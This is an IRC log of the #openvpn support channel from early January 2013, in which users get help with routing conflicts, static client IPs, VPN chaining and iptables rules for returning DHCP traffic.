--- Day changed Tue Jan 01 2013
00:11 -!- joshie [~josh@joshie.net] has joined #openvpn
00:16 -!- brute11k [~brute11k@89.249.230.165] has joined #openvpn
01:34 -!- kyrix [~ashley@97-113-114-23.tukw.qwest.net] has joined #openvpn
01:57 -!- konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
02:04 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 245 seconds]
02:06 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
02:13 -!- joshie [~josh@joshie.net] has joined #openvpn
02:38 -!- kyrix [~ashley@97-113-114-23.tukw.qwest.net] has quit [Quit: Ex-Chat]
03:14 -!- konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Quit: 123asdf]
03:31 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn
03:46 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 245 seconds]
03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has joined #openvpn
03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has quit [Client Quit]
03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has joined #openvpn
03:51 -!- |PaSa| [lamest@2a01:7e00::f03c:91ff:feae:c042] has left #openvpn []
04:16 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
04:50 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds]
04:50 -!- highend [~highend@46.249.58.73] has left #openvpn []
04:56 -!- cosmicgate- [~minasan@46.228.205.104] has joined #openvpn
06:00 -!- sauce [sauce@ool-ad02adcb.dyn.optonline.net] has joined #openvpn
06:00 -!- sauce [sauce@ool-ad02adcb.dyn.optonline.net] has quit [Changing host]
06:00 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn
06:20 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has joined #openvpn
06:46 -!- brute11k [~brute11k@89.249.230.165] has quit [Read error: Operation timed out]
06:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
07:00 -!- brute11k [~brute11k@89.249.230.165] has joined #openvpn
07:23 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
07:25 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds]
07:27 -!- ag4ve [~ag4ve@96.26.67.194] has joined #openvpn
07:29 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has quit [Ping timeout: 252 seconds]
07:31 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has joined #openvpn
07:35 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
07:56 -!- awdjadj [~IceChat77@91.225.135.254] has joined #openvpn
08:01 -!- Porkepix [~Porkepix@81-67-102-99.rev.numericable.fr] has quit [Ping timeout: 255 seconds]
08:02 -!- awdjadj [~IceChat77@91.225.135.254] has quit [Quit: Hard work pays off in the future, laziness pays off now]
08:27 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer]
08:33 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 255 seconds]
08:33 -!- cosmicgate- [~minasan@46.228.205.104] has quit [Ping timeout: 260 seconds]
08:34 -!- cosmicgate- [~minasan@46.228.205.104] has joined #openvpn
08:37 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn
08:59 -!- cosmicgate- [~minasan@46.228.205.104] has quit [Ping timeout: 245 seconds]
09:02 -!- cosmicgate- [~minasan@46.228.205.104] has joined #openvpn
09:12 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 245 seconds]
09:14 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer]
09:14 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn
09:37 -!- cosmicgate- [~minasan@46.228.205.104] has quit [Ping timeout: 276 seconds]
09:40 -!- afuentes [~afuentes@188.84.110.5] has joined #openvpn
09:49 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has joined #openvpn
09:50 -!- moore1 [~moore@41.206.15.33.vgccl.net] has joined #openvpn
09:53 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has quit [Client Quit]
10:09 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
10:20 -!- master_of_master [~master_of@p57B5412B.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
10:22 -!- master_of_master [~master_of@p57B55644.dip.t-dialin.net] has joined #openvpn
10:33 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
10:45 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has joined #openvpn
11:47 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
12:26 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds]
12:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
12:29 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
12:30 -!- moore1 [~moore@41.206.15.33.vgccl.net] has quit [Ping timeout: 252 seconds]
12:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
12:36 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has joined #openvpn
12:36 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has quit [Changing host]
12:36 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
12:42 -!- Porkepix [~Porkepix@81-67-100-9.rev.numericable.fr] has quit [Ping timeout: 255 seconds]
13:07 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds]
13:08 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
13:08 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
13:08 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
13:08 -!- mode/#openvpn [+o krzee] by ChanServ
13:27 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
13:31 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn
13:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has joined #openvpn
14:07 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
14:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Client Quit]
14:13 -!- ezhangin [~ezhangin@c-98-215-78-17.hsd1.in.comcast.net] has joined #openvpn
14:13 < ezhangin> hey guys
14:14 < ezhangin> i'm getting the possible route subnet conflict with the warning as WARNING: potential route subnet conflict between local LAN [192.168.1.0/255.255.255.0] and remote VPN [192.168.1.0/255.255.255.0] except the remote LAN should be 192.168.144.0/24
14:14 < ezhangin> no idea why it isn't showing as that
14:18 < pppingme> paste your config
14:20 < ezhangin> sure
14:20 < ezhangin> this works from my phone weirdly
14:21 < ezhangin> http://pastebin.com/pEvM0fTA
14:21 < ezhangin> if i use my phone as the internet source
14:23 < pppingme> I meant the server config..
14:24 < ezhangin> uh it's a synology let me see how to get that
14:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
14:26 < pppingme> you've got openvpn running on a synology nas?
14:27 < ezhangin> yeah it comes preinstalled
14:27 < ezhangin> it works when i use my phone as an internet source but not this network
14:27 < ezhangin> so weird
14:27 < ezhangin> i'm actually connected to the remote network just fine but i can't get to any of the machines because it is listing a conflict
14:27 < ezhangin> which doesn't make any sense
14:28 < pppingme> when you use your phone, you don't get the message, can you get to the remote network then?
14:29 < ezhangin> i can check
14:31 < ezhangin> brb swapping internet source
14:35 -!- ezhangin [~ezhangin@c-98-215-78-17.hsd1.in.comcast.net] has quit [Ping timeout: 245 seconds]
14:35 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
14:35 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
14:35 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
14:35 -!- mode/#openvpn [+o krzee] by ChanServ
14:40 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 255 seconds]
14:46 -!- brute11k [~brute11k@89.249.230.165] has quit [Ping timeout: 260 seconds]
14:46 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn
14:50 -!- brute11k [~brute11k@89.249.230.165] has joined #openvpn
14:53 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host]
14:53 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
14:53 -!- inimino [~inimino@oftn/board/inimino] has quit [Ping timeout: 248 seconds]
14:54 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Excess Flood]
14:55 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn
14:58 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds]
15:00 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
15:00 -!- mode/#openvpn [+v s7r] by ChanServ
15:00 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host]
15:00 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn
15:00 <+s7r> happy new year to all openvpn community ! ! !
15:10 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn
15:10 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host]
15:10 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
15:15 < M4rc3l> happy new year s7r
15:16 -!- afuentes [~afuentes@188.84.110.5] has quit [Remote host closed the connection]
15:16 <+s7r> may we live well
15:20 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
15:21 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has quit [Ping timeout: 255 seconds]
15:31 -!- m0sphere [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn
15:43 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has quit [Read error: Connection reset by peer]
15:46 < m0sphere> I'm having issues with connecting to the internet from my win7 machine connected to my openvpn server and I believe it has something to do with iptables. I am unable to resolve hostnames, ping ip addresses, or do anything from the win7 machine when connected. here is my ifconfig, route -n, iptables postrouting chain and ipconfig from the windows 7 box http://pastebin.com/kE0qPv8B
15:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-137.28.wb.wifirst.net] has joined #openvpn
15:49 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-137.28.wb.wifirst.net] has quit [Client Quit]
16:02 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds]
16:09 -!- MaxeyPad [~MaxeyPad@96-29-230-119.dhcp.insightbb.com] has quit [Ping timeout: 252 seconds]
16:37 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
16:38 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer]
16:54 -!- inimino [~inimino@oftn/board/inimino] has joined #openvpn
16:58 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:58 < kisom> m0sphere: Did you enable ipv4_forwarding? :)
17:02 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has joined #openvpn
17:02 -!- ade_b [~Ade@koln-4d0dd7d8.pool.mediaWays.net] has quit [Changing host]
17:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
17:03 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection]
17:09 < m0sphere> i figured it out
17:09 < m0sphere> client was missing comp-lzo,
17:20 -!- MaxeyPad [~MaxeyPad@96-29-230-119.dhcp.insightbb.com] has joined #openvpn
17:30 <@krzee> m0sphere, for next time:
17:30 <@krzee> !redirect
17:30 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
17:30 <@vpnHelper> http://ircpimps.org/redirect.png
17:30 <@krzee> the flowchart at the end =]
17:30 <@krzee> i was too late tho
17:32 < m0sphere> ty
17:32 <@krzee> np
17:32 < m0sphere> i'm sure this wont be the last openvpn server i set up and frustrate myself with
17:34 <@EugeneKay> !refund
17:35 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has joined #openvpn
17:35 <@EugeneKay> D'awww, this bot doesn't know it.
17:39 -!- medusaXX [~medusaxx@vpn-147-149.vpn.uni-mannheim.de] has joined #openvpn
17:39 < medusaXX> !welcome
17:39 < medusaXX> !goal
17:39 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
17:39 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
17:39 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
17:40 < medusaXX> is there an estimate how big the openvpn bandwidth overhead is due to encryption etc?
17:44 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has joined #openvpn
18:05 <@krzee> not that i know of
18:05 <@krzee> i'd expect it to vary a bit depending on the traffic
18:06 <@krzee> since the overhead is per packet, not per byte
18:14 < medusaXX> hm ok
18:14 < medusaXX> makes sense
18:23 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds]
18:35 -!- cosmicgate- [~minasan@216.17.109.26] has joined #openvpn
18:42 -!- hjf [~hjf@184-0-17-190.fibertel.com.ar] has quit [Ping timeout: 276 seconds]
18:42 -!- medusaXX [~medusaxx@vpn-147-149.vpn.uni-mannheim.de] has quit []
19:11 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn
19:20 -!- hjf [~hjf@184-0-17-190.fibertel.com.ar] has joined #openvpn
19:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:40 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Quit: Leaving]
20:37 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn
20:38 -!- cosmicgate- [~minasan@216.17.109.26] has quit [Ping timeout: 264 seconds]
20:50 -!- cosmicgate-- [~minasan@113.210.99.116] has quit []
20:51 -!- cosmicgate- [~minasan@216.17.109.26] has joined #openvpn
20:52 -!- F^4 [~FFForever@unaffiliated/ffforever] has joined #openvpn
20:56 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
21:04 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer]
21:05 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
21:10 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer]
21:10 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
21:21 -!- dli [~dli@64.231.53.50] has quit [Remote host closed the connection]
21:39 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has quit [Ping timeout: 255 seconds]
21:48 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn
21:49 < staticsafe> !welcome
21:49 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
21:49 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
21:49 < staticsafe> !howto
21:49 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
21:55 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds]
22:11 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds]
22:26 -!- brute11k [~brute11k@89.249.230.165] has quit [Ping timeout: 265 seconds]
22:36 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn
22:38 < kisom> !iporder
22:38 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
22:39 < kisom> !ipp
22:39 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static
22:43 -!- gardar [~gardar@gardar.net] has quit [Remote host closed the connection]
22:46 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Remote host closed the connection]
22:48 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
22:53 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn
22:54 -!- cosmicgate- [~minasan@216.17.109.26] has quit [Ping timeout: 255 seconds]
22:57 -!- cosmicgate- [~minasan@198.147.22.172] has joined #openvpn
22:57 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection]
23:02 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 260 seconds]
23:04 -!- cosmicgate- [~minasan@198.147.22.172] has quit [Ping timeout: 245 seconds]
23:07 -!- cosmicgate- [~minasan@216.17.109.26] has joined #openvpn
23:13 < pppingme> !iporder
23:13 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
23:14 < pppingme> !static
23:14 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
23:22 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection]
23:22 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
23:22 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
23:22 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
23:22 -!- mode/#openvpn [+o krzee] by ChanServ
23:23 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
23:29 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn
23:30 -!- cosmicgate- [~minasan@216.17.109.26] has quit [Ping timeout: 276 seconds]
23:32 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn
23:34 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 276 seconds]
--- Day changed Wed Jan 02 2013
00:20 < kisom> I'm wondering how D-link is even running a business...
00:21 < kisom> Seems their recent Linux based firmware does not allow the WAN DHCP reply in iptables. So it brings down the network, and then some script runs that allows the DHCP response, and then everything is brought up again
00:22 < kisom> Which causes all connections to drop once an hour when the DHCP lease expires :D
00:22 < kisom> Do not buy Dlink!
00:22 <+pekster> Or just flash another OS like OpenWRT on it :P
00:23 <+pekster> FWIW, -m conntrack --ctstate ESTABLISHED will allow return DHCP traffic :P
00:25 < kisom> Not compatible
00:26 <+pekster> -m state --state ESTABLISHED will work too
00:26 < kisom> The problem is within the INPUT chain
00:26 < kisom> It drops traffic to the router itself
00:27 <+pekster> Sure. I don't do anything special for my DHCP traffic on my OpenWRT device. '-A INPUT -m state --state ESTABLISHED,RELATED' is good enough
00:27 <+pekster> Broken firewall rulesets are a dime a dozen
00:27 < kisom> Yeah, but this is vanilla Dlink firmware
00:27 < kisom> I just plugged it in
00:27 <+pekster> Yup
00:28 <+pekster> And this is why I run my own firewalls :P
00:28 <+pekster> I'd kinda like to find more FOSS stuff to seed just to run more connections through my hardware with 16M of RAM :P
00:29 <+pekster> DHCP leases can do fun stuff to OpenVPN too, depending on DHCP and ovpn configuration
00:48 -!- MaxeyPad_ [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
00:51 -!- MaxeyPad [~MaxeyPad@96-29-230-119.dhcp.insightbb.com] has quit [Ping timeout: 260 seconds]
01:06 -!- MeanderingCode [~Meanderin@75-173-14-154.albq.qwest.net] has quit [Read error: Connection reset by peer]
01:08 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
01:09 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has quit [Ping timeout: 260 seconds]
01:16 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has joined #openvpn
01:31 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn
01:32 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 255 seconds]
01:33 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn
01:35 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 265 seconds]
01:53 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
02:43 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn
02:52 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso]
02:53 -!- cosmicgate-- [~minasan@113.210.99.116] has joined #openvpn
02:55 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 255 seconds]
03:00 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn
03:02 -!- cosmicgate-- [~minasan@113.210.99.116] has quit [Ping timeout: 255 seconds]
03:03 -!- cosmicgate- [~minasan@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Client Quit]
03:14 -!- emate [~marcin@81.219.183.142] has joined #openvpn
03:14 < emate> Hi! I Have a problem with my ccd & ifconfig-push configuration.
03:14 <@krzee> !ifconfig-push
03:15 <@krzee> err
03:15 <@krzee> !static
03:15 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
03:15 < emate> I have ifconfig-push 10.99.0.110 10.99.0.109
03:15 < emate> in ccd file
03:15 < emate> but, another client
03:15 -!- brute11k [~brute11k@89.249.230.92] has joined #openvpn
03:15 < emate> gets the same subnet
03:16 <@krzee> try giving static ips in a different subnet from your pool?
03:17 <@krzee> imagine this
03:17 <@krzee> if you have a dhcp network, giving ips 100-200
03:18 <@krzee> then you start plugging a bunch in
03:18 < emate> openvpn is handling dhcp
03:18 < emate> for clients
03:18 <@krzee> then you bring in a machine and program it a static ip of .100
03:18 <@krzee> what would happen?
03:18 <@krzee> but, you wouldnt do that… because you know to give static ips outside your dhcp pool
03:18 <@krzee> so do the same with openvpn
03:19 <@krzee> =]
03:19 < emate> so should i add new "route xxx.xxx.xx.xxx" line to my openvpn server
03:19 < emate> and assign addresses from this subnet?
03:19 <@krzee> you want some static and some not, right?
03:20 < emate> yes
03:20 <@krzee> yes, that is one way
03:20 <@krzee> another would be a client-connect script
03:20 <@krzee> !iporder
03:20 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
03:22 <@krzee> the first isn easier if you dont code
03:22 < emate> i already have client-connect script for iptables rules (acl), so i will use new subnet for static ips.
03:22 <@krzee> is*
03:22 <@krzee> oh ya?
03:22 <@krzee> if you already have a script which you coded it shouldnt be too hard
03:23 <@krzee> but ya the first method is quite easy too =]
03:24 < emate> if i use 'another subnet & ccd' method, will static-ip from ccd be visible in client-connect script?
03:24 <@krzee> be visible?
03:24 <@krzee> you mean like as a variable?
03:24 < emate> yes
03:24 <@krzee> no, unless you choose to read it in like any script could
03:25 <@krzee> so it wouldnt be passed by openvpn, but its quite available
03:26 < F^4> G'day
03:26 < emate> right now i assign iptables rules for client based on ENV['ifconfig_pool_remote_ip']
03:26 < F^4> Is it possible to vpn a vpn for a faster cross-Atlantic uplink?
03:27 <@krzee> if you happen to have properly positioned servers, it is possible
03:27 <@krzee> sometimes by forcing your link a certain direction you get a faster route than would have happened naturally
03:28 <@krzee> you should not EXPECT this to happen, but it can happen
03:28 <@krzee> (which i know from personal experience)
03:28 < F^4> I figure a LA vpn -> uk vpn -> web should be faster than me -> uk vpn -> web.. no?
03:28 < emate> so, if i define static-ip for client in ccd dir, will client-connect script know what ip is defined in ccd dir?
03:29 <@krzee> F^4, impossible to know, you could get lucky
03:29 <@krzee> emate, as i said, only if you tell it to look for that in your script
03:30 <@krzee> they are 2 different ways to do it, a client-connect script overrides ccd ip addressing
03:30 < emate> krzee: ok, so i have to scan ccd dir in my client-connect script, right?
03:30 <@krzee> however any script could read the info in your ccd files, so it can be done
03:30 <@krzee> right
03:30 <@krzee> or you could make a more simple method in a single file
03:31 <@krzee> since its your script, you can store the data any way you like
03:31 <@krzee> including a db if you feel so inclined
03:31 <@krzee> F^4, ill share an anecdote with ya
03:31 <@krzee> i live in the caribbean on 3rd world internet, with servers in the usa
03:32 <@krzee> i used to have a server in florida which had great international links, and great links to the usa as well
03:32 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:32 <@krzee> when i redirected through that server, i had a better connection to usa than if i used the normal route my ISP gave me
03:34 < F^4> I just figured 2 1gbps connections would do a better job than my 10mbps connection hehe
03:34 < F^4> brb
03:34 <@krzee> i have redirected through many servers, and have only noticed benefit with that 1 server
03:35 <@krzee> F^4, in the end its still only a 10mbps connection
03:35 <@krzee> the connections are between you and the internet, not your vpn servers and the internet
03:35 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
03:36 <@krzee> you're just adjusting your route (which normally adds hops and increases latency)
03:37 -!- Devastator [~devas@177.18.197.127] has joined #openvpn
03:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
03:37 <@krzee> however if you can test, go for it
03:38 < emate> krzee: ok, i see, i'll try to do this in client-connect script
03:39 < emate> krzee: thanks for help
03:40 -!- Devastator [~devas@177.18.197.127] has quit [Changing host]
03:40 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
03:41 < F^4> krzee, Like I said I have it all setup, but the one vpn isn't forwarding to the other one
03:44 <@krzee> emate, no problem, maybe if you get it working you could share it back on our wiki for the next guy =]
03:44 <@krzee> F^4, everything you need to understand is here:
03:44 <@krzee> !route
03:44 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
03:45 <@krzee> but you will need to really understand it
03:45 <@krzee> and treat any subnet behind the other peer as a "lan"
03:46 <@krzee> i call what you are doing vpnchains
03:46 <@krzee> i generally dont support it, but i wrote !route after figuring out how to do it
03:47 <@krzee> !serverlan
03:47 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
03:47 <@krzee> !clientlan
